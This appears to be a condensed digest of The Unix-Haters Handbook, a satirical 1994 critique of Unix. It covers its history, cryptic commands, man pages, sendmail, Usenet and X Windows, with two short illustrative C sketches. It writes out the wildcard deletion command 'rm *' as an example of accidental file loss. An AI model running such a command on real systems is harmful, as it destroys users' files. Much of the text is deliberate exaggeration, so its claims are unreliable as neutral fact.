The Unix-Haters Handbook, Simson Garfinkel, Daniel Weise, Steven Strassmann, 1994

[*][*][*][*][*][*][*][*][ ][ ] => [8]
[*][*][*][*][*][ ][ ][ ][ ][ ] => [5] Basic => Intermediate

Part 1: User friendly?

“The World's First Computer virus”

“Two of the most famous products of Berkeley are LSD and Unix. I don't think that this is a coincidence”

History

The roots of the Unix plague go back to the 1960s, when American Telephone and Telegraph, General Electric, and the Massachusetts Institute of Technology embarked on a project to develop a new kind of computer system called an “information utility.” Heavily funded by the Department of Defense's Advanced Research Projects Agency (then known as ARPA), the idea was to develop a single computer system that would be as reliable as an electrical power plant: providing nonstop computational resources to hundreds or thousands of people. The information utility would be equipped with redundant central processor units, memory banks, and input/output processors, so that one could be serviced while others remained running. The system was designed to have the highest level of computer security, so that the actions of one user could not affect another. Its goal was even there in its name: Multics, short for MULTiplexed Information and Computing Service.

Multics was designed to store and retrieve large data sets, to be used by many different people at once, and to help them communicate. It likewise protected its users from external attack. It was built like a tank. Using Multics felt like driving one.

The Multics project eventually achieved all of its goals. But in 1969, the project was behind schedule and AT&T got cold feet: it pulled the plug on its participation, leaving three of its researchers -Ken Thompson, Dennis Ritchie, and Joseph Ossanna- with some unexpected time on their hands. After the programmers tried unsuccessfully to get management to purchase a DEC System 10 (a powerful time-sharing computer with a sophisticated, interactive operating system), Thompson and his friends retired to writing (and playing) a game called Space Travel on a PDP-7 computer that was sitting unused in a corner of their laboratory.

At first, Thompson used Bell Labs' GE645 to cross-compile the Space Travel program for the PDP-7. But soon -rationalizing that it would be faster to write an operating system for the PDP-7 than to keep developing Space Travel in the comfortable environment of the GE645- Thompson had written an assembler, file system, and minimal kernel for the PDP-7. All to play Space Travel. Thus Unix was brewed.

Like scientists working on germ warfare weapons (another ARPA-funded project from the same time period), the early Unix researchers didn't realize the full implications of their actions. But unlike the germ warfare experimenters, Thompson and Ritchie had no protection. Indeed, rather than practice containment, they saw their role as evangelizers. Thompson and company innocently wrote a few pages they called documentation, and then they actually started sending it out.

At first, the Unix infection was restricted to a few select groups inside Bell Labs. These groups bought a PDP-11/20 (by then Unix had mutated and spread to a second host) and became the first willing victims of the strain. By 1973, AT&T was forced to create the Unix Systems Group for internal support.

Researchers at Columbia University learned of Unix and contacted Ritchie for a copy. Before anybody realized what was happening, Unix had escaped.

Like a classics radio station whose play list spans decades, Unix simultaneously exhibits its mixed and dated heritage. There's Clash-era graphics interfaces; Beatles-era two-letter command names; and system programs (for example, ps) whose terse and obscure output was designed for slow teletypes; Bing Crosby-era command editing (# and @ are still default line editing commands), and Scott Joplin-era core dumps.

Sex, drugs and Unix

While Unix spread like a virus, its adoption by so many can only be described by another metaphor: that of a designer drug.

Like any good drug dealer, AT&T gave away free samples of Unix to university types during the 1970s. Researchers and students got a better high from Unix than from any other OS. It was cheap, it was malleable, it ran on relatively inexpensive hardware. And it was superior, for their needs, to anything else they could obtain. Better operating systems that would soon be competing with Unix either required hardware that universities couldn't afford, weren't “free”, or weren't yet out of the labs that were busily synthesizing them. AT&T's policy produced, at no cost, scads of freshly minted Unix hackers that were psychologically, if not chemically, dependent on Unix.

Standardizing Unconformity

“The wonderful thing about standards is that there are so many of them to choose from.”

What sort of specification does a version of Unix satisfy? POSIX? X/Open? CORBA? There is so much wiggle room in these standards as to make the idea that a company might have liability for not following them ludicrous to ponder. Indeed, everybody follows these self-designed standards, yet none of the products are compatible.

Unix Myths

Unix has its own collection of myths, as well as a network of dealers pushing them. Perhaps you've seen them before.

  • It's standard.
  • It's fast and efficient.
  • It's the right OS for all purposes.
  • It's small, simple, and elegant.
  • Shell scripts and pipelines are a great way to structure complex problems and systems.
  • It's documented on line.
  • It's documented.
  • It's written in a high-level language
  • X and Motif make Unix as user-friendly and simple as the Macintosh.
  • Processes are cheap.
  • It invented:
    • the hierarchical file system
    • electronic mail
    • networking and the Internet protocols
    • remote file system
    • security/passwords/file protection
    • finger
    • uniform treatment of I/O devices
  • It has a productive programming environment.
  • It's a modern operating system.
  • It's what people are asking for.
  • The source code:
    • is available
    • is understandable
    • you buy from your manufacturer actually matches what you are running

Part 2: Welcome, New User!

“Like Russian Roulette with Six Bullets Loaded”

“Ken Thompson has an automobile which he helped design. Unlike most automobiles, it has neither speedometer, nor gas gauge, nor any of the other numerous idiot lights which plague the modern driver. Rather, if the driver makes a mistake, a giant '?' lights up in the center of the dashboard. 'The experienced driver,' says Thompson, 'will usually know what's wrong.'” -Anonymous

New users of a computer system (and even seasoned ones) require a certain amount of hospitality from that system. At a minimum, the gracious computer system offers the following amenities to its guests:

  • Logical command names that follow from function
  • Careful handling of dangerous commands
  • Consistency and predictability in how commands behave and in how they interpret their options and arguments
  • Easily found and readable on-line documentation
  • Comprehensible and useful feedback when commands fail

Cryptic Command Names

The novice Unix user is always surprised by Unix's choice of command names. No amount of training on DOS or the Mac prepares one for the majestic beauty of cryptic two-letter command names such as cp, rm, and ls.

If Dennis and Ken had a Selectric instead of a Teletype, we'd probably be typing “copy” and “remove” instead of “cp” and “rm”. Proof again that technology limits our choices as often as it expands them.

After more than two decades, what is the excuse for continuing this tradition? The implacable force of history, AKA existing code and books. If a vendor replaced rm by, say, remove, then every book describing Unix would no longer apply to its system, and every shell script that calls rm would also no longer apply. Such a vendor might as well stop implementing the POSIX standard while it was at it.

Accidents will happen

Files die and require reincarnation more often under Unix than under any other operating system. Here's why:

  • The Unix file system lacks version numbers.

Automatic file versioning, which gives new versions of files new names or numbered extensions, would preserve previous versions of files. This would prevent new versions of files from overwriting old versions. Overwriting happens all the time in Unix.

  • Unix programmers have a criminally lax attitude toward error reporting and checking.

Many programs don't bother to see if all the bytes in their output file can be written to disk. Some don't even bother to see if their output file has been created. Nevertheless, these programs are sure to delete their input files when they are finished.

  • The Unix shell, not its clients, expands “*”.

Having the shell expand “*” prevents the client program, such as rm, from doing a sanity check to prevent murder and mayhem. Even DOS verifies potentially dangerous commands such as “del *.*”. Under Unix, however, the file deletion program cannot determine whether the user typed:

% rm *
or
% rm file1 file2 file3 ...

This situation could be alleviated somewhat if the original command line was somehow saved and passed on to the invoked client command. Perhaps it could be stuffed into one of those handy environment variables.
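
A minimal C sketch of the point above (our own illustration, not actual rm code): by the time a deletion program's main() runs, the shell has already replaced “*” with the matching file names, so the program cannot tell “rm *” apart from an explicitly typed list of files.

#include <stdio.h>

/* Hypothetical stand-in for a deletion program's view of the world. */
int main(int argc, char *argv[])
{
    /* argv[1..argc-1] is just a list of names; the original command
       line, wildcards and all, is long gone by this point. */
    for (int i = 1; i < argc; i++)
        printf("would remove: %s\n", argv[i]);
    return 0;
}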

  • File deletion is forever.

Unix has no “undelete” command. With other, safer operating systems, deleting a file marks the blocks used by that file as “available for use” and moves the directory entry for that file into a special directory of “deleted files”. If the disk fills up, the space taken by deleted files is reclaimed.

Most operating systems use the two-step, delete-and-purge idea to return the disk blocks used by files to the operating system. This isn't rocket science; even the Macintosh, back in 1984, separated “throwing things into the trash” from “emptying the trash.” Tenex had it back in 1974.

Consistently Inconsistent

Predictable commands share option names, take arguments in roughly the same order, and, where possible, produce similar output. Consistency requires a concentrated effort on the part of some central body that promulgates standards. Applications on the Macintosh are consistent because they follow a guide published by Apple. No such body has ever existed for Unix utilities. As a result, some utilities take their options preceded by a dash, some don't. Some read standard input, some don't. Some write standard output, some don't. Some create files world writable, some don't. Some report errors, some don't. Some put a space between an option and a file name, some don't.

The Unix attitude

The Unix philosophy isn't written advice that comes from Bell Labs or the Unix System Laboratory. It's a free-floating ethic. Various authors list different attributes of it. Life with Unix, by Don Libes and Sandy Ressler (Prentice Hall, 1989) does a particularly good job summing it up:

  • Small is beautiful
  • 10 percent of the work solves 90 percent of the problems
  • When faced with a choice, do whatever is simpler.

According to the empirical evidence of Unix programs and utilities, a more accurate summary of the Unix Philosophy is:

  • A small program is more desirable than a program that is functional or correct
  • A shoddy job is perfectly acceptable
  • When faced with a choice, cop out.

Unix doesn't have a philosophy: it has an attitude. An attitude that says a simple, half-done job is more virtuous than a complex, well-executed one. An attitude that asserts the programmer's time is more important than the user's time, even if there are thousands of users for every programmer. It's an attitude that praises the lowest common denominator.

Part 3: Documentation?

“What documentation?”

“One of the advantages of using UNIX to teach an operating systems course is the sources and documentation will easily fit into a student's briefcase.” -John Lions, University of New South Wales, talking about Version 6, circa 1976

For years, there were three simple sources for detailed Unix knowledge:

  1. Read the source code
  2. Write your own version
  3. Call up the program's author on the phone (or inquire over the network via e-mail).

Unix was like Homer, handed down as oral wisdom. There simply were no serious Unix users who were not also kernel hackers -or at least had kernel hackers in easy reach. What documentation was actually written -the infamous Unix “man pages”- was really nothing more than a collection of reminders for people who already knew what they were doing.

The Unix documentation system began as a single program called man. man was a tiny utility that took the argument that you provided, found the appropriate matching file, piped the file through nroff with the “man” macros (a set of text formatting macros used for nothing else on the planet), and finally sent the output through pg or more.

Today's hypertext systems let you jump from article to article in a large database at the click of a mouse button; man pages, by contrast, merely print a section called “SEE ALSO” at the bottom of each page and invite the user to type “man something else” on the command line following the prompt. How about indexing on-line documentation? These days you can buy a CD-ROM edition of the Oxford English Dictionary that indexes every single word in the entire multivolume set; man pages, on the other hand, are still indexed solely by the program's name and one-line description. Even DOS now has an indexed, hypertext system for on-line documentation. Man pages, meanwhile, are still formatted for the 80-column, 66-line page of a DEC printing terminal.

Shell documentation

The Unix shell always presented a problem for Unix documentation writers: The shells, after all, have built-in commands. Should built-ins be documented on their own man pages or on the man page for the shell? Traditionally, these programs have been documented on the shell page. This approach is logically consistent, since there is no while or if or set command. That these commands look like real commands is an illusion. Unfortunately, this attitude causes problems for new users -the very people for whom documentation should be written.

For example, a user might hear that Unix has a “history” feature which saves them the trouble of having to retype a command that they have previously typed. To find out more about the “history” command, an aspiring novice might try:

% man history
No manual entry for history.

That's because “history” is a built-in shell command. There are many of them. Try to find a complete list. (Go ahead, looking at the man page for sh or csh isn't cheating).

How to get real documentation

Actually, the best form of Unix documentation is frequently running the strings command over a program's object code. Using strings, you can get a complete list of the program's hard-coded file names, environment variables, undocumented options, obscure error messages, and so forth. For example, if you want to find out where the cpp program searches for #include files, you are much better off using strings than man:

next% man cpp
No manual entry for cpp

next% strings /lib/cpp | grep /
/lib/cpp
/lib/
/usr/local/lib/
/cpp

next%

Hmmm… Excuse us for one second:

% ls /lib
cpp*
cpp-precomp*

next% strings /lib/cpp-precomp | grep /
/*%s*/
//%s
/usr/local/include
/NextDeveloper/Headers
/NextDeveloper/Headers/ansi
/NextDeveloper/Headers/bsd
/LocalDeveloper/Headers
/LocalDeveloper/Headers/ansi
/LocalDeveloper/Headers/bsd
/NextDeveloper/2.0CompatibleHeaders
%s%s
/lib/%s/specs

next%

Silly us. NEXTSTEP's /lib/cpp calls /lib/cpp-precomp. You won't find that documented in the man page either:

next% man cpp-precomp
No manual entry for cpp-precomp.

The source code is the documentation

As fate would have it, AT&T's plan backfired. In the absence of written documentation, the only way to get details about how the kernel or user commands worked was by looking at the source code. As a result, Unix sources were widely pirated during the operating system's first 20 years. Consultants, programmers, and system administrators didn't copy the source because they wanted to compile it and then stamp out illegal Unix clones: they made copies because they needed the source code for documentation. Copies of Unix source code filtered out everywhere, but it was a justifiable felony: the documentation provided by the Unix vendors was simply not adequate. This is not to say that the source code contained worthwhile secrets. Anyone who had both access to the source code and the inclination to read it soon found themselves in for a rude surprise:

/* You are not expected to understand this */

Although this comment originally appeared in the Unix V6 kernel source code, it could easily have applied to any of the original AT&T code, which was a nightmare of in-line hand-optimizations and micro hacks. Register variables with names like p, pp, and ppp being used for multitudes of different purposes in different parts of a single function. Comments like “this function is recursive,” as if recursion were a difficult-to-understand concept. The fact is, AT&T's institutional attitude toward documentation for users and programmers was indicative of a sloppy attitude toward writing in general, and writing computer programs in particular.

Part 4: Mail

“Don't talk to me, I'm not a typewriter!”

“Not having sendmail is like not having VD.” -Ron Heiby, Former moderator, comp.newprod

Sendmail: The Vietnam of Berkeley Unix

Sendmail was written by Eric Allman at the University of California at Berkeley in 1983 and was included in the Berkeley 4.2 Unix distribution as BSD's “internetwork mail router.” The program was developed as a single “crossbar” for interconnecting disparate mail networks. In its first incarnation, sendmail interconnected UUCP, BerkNet, and ARPANET (the precursor to the Internet) networks. Despite its problems, sendmail was better than the Unix mail program that it replaced: delivermail.

In his January 1983 USENIX paper, Allman defined eight goals for sendmail:

  1. Sendmail had to be compatible with existing mail programs.
  2. Sendmail had to be reliable, never losing a mail message.
  3. Existing software had to do the actual message delivery if at all possible.
  4. Sendmail had to work in both simple and extremely complex environments.
  5. Sendmail's configuration could not be compiled into the program, but had to be read at startup.
  6. Sendmail had to let various groups maintain their own mailing lists and let individuals specify their own mail forwarding, without having individuals or groups modify the system alias file.
  7. Each user had to be able to specify that a program should be executed to process incoming mail (so that users could run “vacation” programs).
  8. Network traffic had to be minimized by batching addresses to a single host when at all possible.

(An unstated goal in Allman's 1983 paper was that sendmail also had to implement the ARPANET's nascent SMTP (Simple Mail Transfer Protocol) in order to satisfy the generals who were funding Unix development at Berkeley.)

Sendmail was built while the Internet mail handling systems were in flux. As a result, it had to be programmable so that it could handle any possible changes in the standards. Delve into the mysteries of sendmail's unreadable sendmail.cf files and you'll discover ways of rewiring sendmail's insides so that practically any string of line noise is a valid e-mail address. That was great in 1985. By 1994, the Internet mail standards had been decided upon and such flexibility is no longer needed. Nevertheless, all of sendmail's rope is still there, ready to make a hangman's knot, should anyone have a sudden urge.

Sendmail is one of those clever programs that performs a variety of different functions depending on what name you use to invoke it. Sometimes it's the good ol' sendmail; other times it is the mail queue viewing program or the aliases database-builder. “Sendmail Revisited” admits that bundling so much functionality into a single program was probably a mistake: certainly the SMTP server, mail queue handler, and alias database management system should have been handled by different programs (no doubt carrying through on the Unix “tools” philosophy). Instead we have sendmail, which continues to grow beyond all expectations.

Not following protocols

Every society has rules to prevent chaos and to promote the general welfare. Just as a neighborhood of people sharing a street might be composed of people who came from Europe, Africa, Asia, and South America, a neighborhood of computers sharing a network cable often comes from disparate places and speaks disparate languages. Just as the people who share the street make up a common language for communication, the computers are supposed to follow a common language, called a protocol, for communication.

This strategy generally works until either a jerk moves onto the block or a Unix machine is let onto the network. Neither the jerk nor Unix follows the rules. Both turn over trash cans, play the stereo too loudly, make life miserable for everyone else, and attract wimpy sycophants who bolster their lack of power by associating with the bully.

We wish that we were exaggerating, but we're not. There are published protocols. You can look them up in the computer equivalent of city hall -the RFCs. Then you can use Unix and verify lossage caused by Unix's unwillingness to follow protocol.

For example, an antisocial and illegal behavior of sendmail is to send mail to the wrong address. Let's say that you send a real letter via the U.S. Postal Service that has your return address on it, but that you mailed it from the mailbox down the street, or you gave it to a friend to mail for you. Let's suppose further that the recipient marks “Return to sender” on the letter. An intelligent system would return the letter to the return address; an unintelligent system would return the letter to where it was mailed from, such as to the mailbox down the street or to your friend.

That system mimicking a moldy avocado is, of course, Unix, but the real story is a little more complicated because you can ask your mail program to do tasks you could never ask of your mailman. For example, when responding to an electronic letter, you don't have to mail the return envelope yourself; the computer does it for you. Computers, being the nitpickers with elephantine memories that they are, keep track not only of who a response should be sent to (the return address, called in computer parlance the “Reply-To:” field), but where it was mailed from (kept in the “From:” field). The computers' rules clearly state that a response to an electronic message goes to the address in the “Reply-To:” field, not the “From:” field. Some versions of Unix flout this rule, wreaking havoc on the unsuspecting. Those who religiously believe in Unix think it does the right thing, misassigning blame for its bad behavior to working software, much as Detroit blames Japan when Detroit's cars can't compete.

For example, consider this sequence of events when Devon McCullough complained to one of the subscribers of the electronic mailing list called PAGANISM that the subscriber had sent a posting to the e-mail address PAGANISM-REQUEST@MC.LCS.MIT.EDU and not to the address PAGANISM@MC.LCS.MIT.EDU:

From:	Devon Sean McCullough <devon@ghoti.lcs.mit.edu>
To:	<PAGANISM Digest Subscriber>
This message was sent to PAGANISM-REQUEST, not PAGANISM. Either you or your 'r' key
screwed up here. Or else the digest is screwed up. Anyway, you could try sending it
again.
  -Devon

The clueless weenie sent back the following message to Devon, complaining that the fault lay not with himself or sendmail, but with the PAGANISM digest itself:

Date:	Sun, 27 Jan 91 11:28:11 PST
From:	<Paganism Digest Subscriber>
To:	Devon Sean McCullough <devon@ghoti.lcs.mit.edu>
>From my perspective, the digest is at fault. Berkeley Unix Mail is what I use, and
>it ignores the "Reply-to:" line, using the "From:" line instead. So the only way
>for me to get the correct address is to either back-space over the dash and type
>the @ etc in, or save it somewhere and go through some contortions to link the
>edited file to the old echoed address. Why make me go to all that trouble? This is
>the main reason that I rarely post to the PAGANISM digest at MIT.

The interpretation of which is all too easy to understand:

Date:	Mon, 28 Jan 91 18:54:58 EST
From:	Alan Bawden <alan@ai.mit.edu>
To:	UNIX-HATERS
Subject:	Depressing

Notice the typical Unix weenie reasoning here:

“The digestifier produces a header with a proper Reply-to field, in the expectation that your mail reading tool will interpret the header in the documented, standard, RFC822 way. Berkeley Unix Mail, contrary to all standards, and unlike all reasonable mail reading tools, ignores the Reply-To field and incorrectly uses the From field instead.”

Therefore:

“The digestifier is at fault.”

Frankly, I think the entire human race is doomed. We haven't got a snowball's chance of doing anything other than choking ourselves to death on our own waste products during the next hundred years.

It should be noted that this particular feature of Berkeley Mail has been fixed; Mail now properly follows the “Reply-To:” header if it is present in a mail message. On the other hand, the attitude that the Unix implementation is a more accurate standard than the standard itself continues to this day. It's pervasive. The Internet Engineering Task Force (IETF) has embarked on an effort to rewrite the Internet's RFC “standards” so that they comply with the Unix programs that implement them.

Error messages

The Unix mail system knows that it isn't perfect, and it is willing to tell you so. But it doesn't always do so in an intuitive way. Here's a short listing of the error messages that people often witness:

550 chiarell . . . User unknown: Not a typewriter
550 <bogus@ASC.SLB.COM> . . . User unknown: Address already in use
550 zhang@uni-dortmund.de . . . User unknown: Not a bicycle
553 abingdon I refuse to talk to myself
554 "| /usr/new/lib/mh/slocal -user $USER" . . . unknown mailer error 1
554 "| filter -v" . . . unknown mailer error 1
554 Too many recipients for no message body

“Not a typewriter” is sendmail's most legion error message. We figure that the error message “not a bicycle” is probably some system administrator's attempt at humor. The message “Too many recipients for no message body” is sendmail's attempt at Big Brotherhood. It thinks it knows better than the proletariat masses, and it won't send a message with just a subject line.

The conclusion is obvious: you are lucky to get mail at all or to have messages you send get delivered. Unix zealots who think that mail systems are complex and hard to get right are mistaken. Mail used to work, and work highly reliably. Nothing was wrong with mail systems until Unix came along and broke things in the name of “progress.”

Part 5: Snoozenet

“I post, Therefore I Am”

“Usenet is a cesspool, a dung heap” -Patrick A. Townson

We're told that the information superhighway is just around the corner. Nevertheless, we already have to deal with the slow-moving garbage trucks clogging up the highway's arteries. These trash-laden vehicles are NNTP packets and compressed UUCP batches, shipping around untold gigabytes a day of trash. This trash is known, collectively, as Usenet.

The great renaming

As more sites joined the net and more groups were created, the net/mod scheme collapsed. A receiving site that wanted only the technical groups forced the sending site to explicitly list all of them, which, in turn, required very long lines in the configuration files. Not surprisingly (especially not surprisingly if you've been reading this book straight through instead of leafing through it in the bookstore), they often exceeded the built-in limits of the Unix tools that manipulated them.

In the early 1980s Rick Adams addressed the situation. He studied the list of current groups and, like a modern day Linnaeus, categorized them into the “big seven” that are still used today:

comp	Discussion of computers (hardware, software, etc.)
news	Discussion of Usenet itself
sci	Scientific discussion (chemistry, etc.)
rec	Recreational discussion (TV, sports, etc.)
talk	Political, religious, and issue-oriented discussion
soc	Social issues, such as culture
misc	Everything else

This information highway needs information

Newsgroups with large amounts of noise rarely keep those subscribers who can constructively add to the value of the newsgroup. The result is a polarization of newsgroups: those with low traffic and high content, and those with high traffic and low content. The polarization is sometimes a creeping force, bringing all discussion down to the lowest common denominator. As the quality newsgroups get noticed, more people join -first as readers, then as posters.

rn, trn: You get what you pay for

Like almost all of the Usenet software, the programs that people use to read (and post) news are available as freely redistributable source code. This policy is largely a matter of self-preservation on the part of the authors:

  • It's much easier to let other people fix the bugs and port the code; you can even turn the reason around on its head and explain why this is a virtue of giving out the source.
  • Unix isn't standard; the poor author doesn't stand a chance in hell of being able to write code that will “just work” on all modern Unixes.
  • Even if you got a single set of sources that worked everywhere, different Unix C compilers and libraries would ensure that compiled files won't work anywhere but the machine where they were built.

Part 6: Terminal insanity

“Curses! Foiled again!”

Original Sin

Unfortunately for us, Unix was designed in the days of teletypes. Teletypes support operations like printing a character, backspacing, and moving the paper up a line at a time. Since that time, two different input/output technologies have been developed: the character-based video display terminal (VDT), which could output characters much faster than hardcopy terminals and, at the very least, could place the cursor at arbitrary positions on the screen; and the bit-mapped screen, where each separate pixel could be turned on or off (and, in the case of color, each pixel could have its own color from a color map).

Part 7: The X-Windows disaster

“How to make a 50-MIPS workstation run like a 4.77 MHz IBM PC”

“If the designers of X Windows built cars, there would be no fewer than five steering wheels hidden about the cockpit, none of which followed the same principles -but you'd be able to shift gears with your car stereo. Useful feature, that.” -Marcus J. Ranum, Digital Equipment Corporation

X windows is the Iran-Contra of graphical user interfaces: a tragedy of political compromises, entangled alliances, marketing hype, and just plain greed. X windows is to memory as Ronald Reagan was to money. Years of “Voodoo Ergonomics” have resulted in an unprecedented memory deficit of gargantuan proportions. Divisive dependencies, distributed deadlocks, and partisan protocols have tightened gridlocks, aggravated race conditions, and promulgated double standards.

X has had its share of $5,000 toilet seats -like Sun's Open Look clock tool, which gobbles up 1.4 megabytes of real memory! If you sacrificed all the RAM from 22 Commodore 64s to clock tool, it still wouldn't have enough to tell you the time. Even the vanilla X11R4 “xclock” utility consumes 656K to run. And X's memory usage is increasing.

X: The first fully modular software disaster

X Windows started out as one man's project in an office on the fifth floor of MIT's Laboratory for Computer Science. A wizardly hacker, who was familiar with W, a window system written at Stanford University as part of the V project, decided to write a distributed graphical display server. The idea was to allow a program, called a client, to run on one computer and allow it to display on another computer that was running a special program called a window server. The two computers might be VAXes or Suns, or one of each, as long as the computers were networked together and each implemented the X protocol.

Note: We have tried to avoid paragraph-length footnotes in this book, but X has defeated us by switching the meaning of client and server. In all other client/server relationships, the server is the remote machine that runs the application (i.e., the server provides services, such as database service or computation service). For some perverse reason that's better left to imagination, X insists on calling the program running on the remote machine “the client”. This program displays its windows on the “window server”. We're going to follow X terminology when discussing graphical client/servers. So when you see “client” think “the remote machine where the application is running” and when you see “server” think “the local machine that displays output and accepts user input.”

The nongraphical GUI

X was designed to run three programs: xterm, xload, and xclock. (The idea of a window manager was added as an afterthought, and it shows.) For the first few years of its development at MIT, these were, in fact, the only programs that ran under the window system. Notice that none of these programs have any semblance of a graphical user interface (except xclock), only one of these programs implements anything in the way of cut-and-paste (and then, only a single data type is supported), and none of them requires a particularly sophisticated approach to color management. Is it any wonder, then, that these are all areas in which modern X falls down? Ten years later, most computers running X run just four programs: xterm, xload, xclock, and a window manager. And most xterm windows run Emacs! X has to be the most expensive way ever of popping up an Emacs window. It sure would have been much cheaper and easier to put terminal handling in the kernel where it belongs, rather than forcing people to purchase expensive bit-mapped terminals to run character-based applications. On the other hand, then users wouldn't get all of those ugly fonts. It's a trade-off.

The Motif self-abuse kit

X gave Unix vendors something they had professed to want for years: a standard that allowed programs built for different computers to interoperate. But it didn't give them enough. X gave programmers a way to display windows and pixels, but it didn't speak to buttons, menus, scroll bars, or any of the other necessary elements of a graphical user interface. Programmers invented their own. Soon the Unix community had six or so different interface standards. A bunch of people who hadn't written 10 lines of code in as many years set up shop in a brick building in Cambridge, Massachusetts, that was the former house of a failed computer company and came up with a “solution”: the Open Software Foundation's Motif.

What Motif does is make Unix slow. Real slow. A stated design goal of Motif was to give the X Window System the window management capabilities of HP's circa-1988 window manager and the visual elegance of Microsoft Windows. We kid you not.

Recipe for disaster: start with the Microsoft Windows metaphor, which was designed and hand coded in assembler. Build something on top of three or four layers of X to look like Windows. Call it “Motif.” Now put two 486 boxes side by side, one running Windows and one running Unix/Motif. Watch one crawl. Watch it wither. Watch it drop faster than the putsch in Russia. Motif can't compete with the Macintosh OS or with DOS/Windows as a delivery platform.

Ice cube: The lethal weapon

One of the fundamental design goals of X was to separate the window manager from the window server. “Mechanism, not policy” was the mantra. That is, the X server provided a mechanism for drawing on the screen and managing windows, but did not implement a particular policy for human-computer interaction. While this might have seemed like a good idea at the time (especially if you are in a research community, experimenting with different approaches for solving the human-computer interaction problem), it created a veritable user interface Tower of Babel.

If you sit down at a friend's Macintosh, with its single mouse button, you can use it with no problems. If you sit down at a friend's Windows box, you can use it with no problems. But just try making sense of a friend's X terminal: three buttons, each one programmed a different way to perform a different function on each different day of the week -and that's before you consider combinations like control-left-button, shift-right-button, control-shift-meta-middle-button, and so on. Things are not much better from the programmer's point of view.

As a result, one of the most amazing pieces of literature to come out of the X Consortium is the “Inter-Client Communication Conventions Manual,” more fondly known as the “ICCCM,” “Ice Cubed,” or “I39L” (short for “I, 39 letters, L”). It describes protocols that X clients must use to communicate with each other via the X server, including diverse topics like window management, selections, keyboard and color map focus, and session management. In short, it tries to cover everything the X designers forgot and tries to fix everything they got wrong. But it was too late -by the time ICCCM was published, people were already writing window managers and tool kits, so each new version of the ICCCM was forced to bend over backwards to be backward compatible with the mistakes of the past.

The ICCCM is unbelievably dense, it must be followed to the last letter, and it still doesn't work. ICCCM compliance is one of the most complex ordeals of implementing X tool kits, window managers, and even simple applications. It's so difficult that many of the benefits just aren't worth the hassle of compliance. And when one program doesn't comply, it screws up other programs. This is the reason that cut-and-paste never works properly with X (unless you are cutting and pasting straight ASCII text), drag-and-drop locks up the system, color maps flash wildly and are never installed at the right time, keyboard focus lags behind the cursor, keys go to the wrong window, and deleting a pop-up window can quit the whole application. To avoid this, you have to crossbar test your program with every other application, and with all possible window managers, and then plead with the vendors to fix their problems in the next release.

In summary, ICCCM is a technological disaster: a toxic waste dump of broken protocols, backward compatibility nightmares, complex non-solutions to obsolete non-problems, a twisted mass of scabs and scar tissue intended to cover up the moral and intellectual depravity of the industry's standard naked emperor.

X Myths

  • Myth: X demonstrates the power of client/server computing

At the mere mention of network window systems, certain propeller heads who confuse technology with economics will start foaming at the mouth about their client/server models and how in the future palmtops will just run the X server and let the other half of the program run on some Cray down the street. They've become unwitting pawns in the hardware manufacturers' conspiracy to sell newer systems each year. After all, what better way is there to force users to upgrade their hardware than to give them X, where a single application can bog down the client, the server, and the network between them, simultaneously!

  • Myth: X makes Unix “easy to use”

Graphical interfaces can only paper over misdesigns and kludges in the underlying operating system; they can't eliminate them. The “drag-and-drop” metaphor tries to cover up the Unix file system, but so little of Unix is designed for the desktop metaphor that it's just one kludge on top of another, with little holes and sharp edges popping up everywhere, making for ineffective and unreliable performance.

  • Myth: X is “customizable”
  • Myth: X is “portable”
  • Myth: X is device independent

X is extremely device dependent because all X graphics are specified in pixel coordinates. Graphics drawn on different resolution screens come out at different sizes, so you have to scale all the coordinates yourself if you want to draw at a certain size. Not all screens even have square pixels: unless you don't mind rectangular squares and oval circles, you also have to adjust all coordinates according to the pixel aspect ratio.
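
To make the pixel-coordinate problem concrete, here is a small, hedged C sketch (our own example, using standard Xlib calls; the 20 mm target size is arbitrary). It computes how many pixels correspond to a given physical size on the current screen -exactly the kind of per-display arithmetic an application has to do by hand if it wants its output to come out the same size everywhere:

#include <X11/Xlib.h>
#include <stdio.h>

int main(void)
{
    Display *dpy = XOpenDisplay(NULL);          /* connect to the X server */
    if (dpy == NULL) {
        fprintf(stderr, "cannot open display\n");
        return 1;
    }

    int scr = DefaultScreen(dpy);

    /* Pixels per millimetre, computed separately per axis: pixels are
       not guaranteed to be square, so the two ratios can differ. */
    double px_per_mm_x = (double)DisplayWidth(dpy, scr)  / DisplayWidthMM(dpy, scr);
    double px_per_mm_y = (double)DisplayHeight(dpy, scr) / DisplayHeightMM(dpy, scr);

    double target_mm = 20.0;                    /* we want a 20 mm square */
    int w = (int)(target_mm * px_per_mm_x);     /* width in pixels  */
    int h = (int)(target_mm * px_per_mm_y);     /* height in pixels */

    printf("a 20 mm square is %d x %d pixels on this screen\n", w, h);

    XCloseDisplay(dpy);
    return 0;
}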

Part 8: csh, pipes, and find

“Power tools for power fools”

“I have a natural revulsion to any operating system that shows so little planning as to have named all of its commands after digestive noises (awk, grep, fsck, nroff).” -Unknown

The Unix “power tool” metaphor is a canard. It's nothing more than a slogan behind which Unix hides its arcane patchwork of commands and ad hoc utilities. A real power tool amplifies the power of its user with little additional effort or instruction. Anyone capable of using a screwdriver or drill can use a power screwdriver or power drill. The user needs no understanding of electricity, motors, torquing, magnetism, heat dissipation, or maintenance. She just needs to plug it in and wear safety glasses. It's rare to find a power tool that is fatally flawed in the hardware store: most badly designed power tools either don't make it to market or result in costly lawsuits, removing them from the market and punishing their makers.

Unix power tools don't fit this mold. Unlike the modest goals of its designers to have tools that were simple and single-purposed, today's Unix tools are over-featured, over-designed, and over-engineered. For example, ls, a program that once only listed files, now has more than 18 different options that control everything from sort order to the number of columns in which the printout appears -all functions that are better handled with other tools (and once were). The find command writes cpio-formatted output files in addition to finding files (something easily done by connecting the two commands with an infamous Unix pipe). Today, the Unix equivalent of a power drill would have 20 dials and switches, come with a nonstandard plug, require the user to hand-wind the motor coil, and not accept 3/8" or 7/8" drill bits (though this would be documented in the BUGS section of its instruction manual).

The shell game

The inventors of Unix had a great idea: make the command processor be just another user-level program. If users didn't like the default command processor, they could write their own. More importantly, shells could evolve, presumably so that they could become more powerful, flexible, and easy to use.

It was a great idea, but it backfired. The slow accretion of features caused a jumble. Because they weren't designed, but evolved, the curse of all programming languages, an installed base of programs, hit them extra hard. As soon as a feature was added to a shell, someone wrote a shell script that depended on that feature, thereby ensuring its survival. Bad ideas and features don't die out.

The result is today's plethora of incomplete, incompatible shells (descriptions of each shell are from their respective man pages):

  • sh A command programming language that executes commands read from a terminal or a file
  • jsh Identical [to sh], but with csh-style job control enabled
  • csh A shell with C-like syntax
  • tcsh Csh with emacs-style editing
  • ksh KornShell, another command and programming language
